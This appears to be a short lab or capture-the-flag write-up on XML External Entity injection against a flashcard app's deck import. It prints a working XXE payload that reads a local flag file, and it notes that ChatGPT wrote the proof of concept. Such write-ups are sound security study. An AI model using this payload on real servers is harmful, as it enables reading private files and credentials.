Tanuki

Today's lab is about XXE (XML External Entity injection).

Whenever an endpoint accepts JSON, it is worth trying to send the same data as XML too. Some servers refuse it, but some happily accept and parse it, and if that parser resolves external entities you have an XXE. In this lab we know XML is accepted because the frontend tells us so.

Note: don't forget to set the request's Content-Type header to application/xml.

The first thing to do is look at the JSON import example.

{
  "name": "Sample Deck",
  "description": "A sample deck showing the import format for custom flashcards",
  "category": "Example",
  "cards": [
    {
      "front": "What is the capital of France?",
      "back": "Paris - the city of lights and capital of France since 987 AD."
    },
    {
      "front": "What programming language is this app built with?",
      "back": "JavaScript - using Node.js for backend and React for frontend."
    }
  ]
}

I ran this JSON through ChatGPT and asked it to make an XXE DTD PoC from it. ChatGPT is my cool friend and helped me out.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE creds [
  <!ELEMENT creds ANY >
  <!ENTITY xxe SYSTEM "file://flag.txt" >
]>
<deck>
  <name>Ex Deck</name>
  <cards>
    <card>
      <front>&xxe;</front>
      <back>pass</back>
    </card>
  </cards>
</deck>

After uploading this payload, I opened up my deck.

The <front> tag displayed my flag 🇧🇪
